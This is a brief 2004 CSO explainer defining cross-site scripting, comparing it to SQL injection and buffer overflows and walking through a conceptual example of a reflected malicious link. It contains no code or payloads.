• United States



by CSO Contributor

Cross-site Scripting

Apr 02, 20041 min
CSO and CISOData and Information Security

Like SQL Injection and Buffer Overlow attacks, cross-site scripting aims to cause a computer to execute commands it shouldn’t. In cross-site scripting, the attacker hides malicious code (a script) in an HTML link on an innocuous-looking Web page (or in an email).

Example: Let’s say I find a URL which purports to link to a Web site I normally trust. Unbeknownst to me, the link includes an embedded HTML script. When I click on the link, my browser goes to that Web site’s host and requests the page for that URL. If the host computer is vulnerable to cross-site scripting, it dynamically generates a Web page in response to the request, but the Web page it generates includes the embedded HTML script. Because my browser trusts that Web host, it executes the malicious script.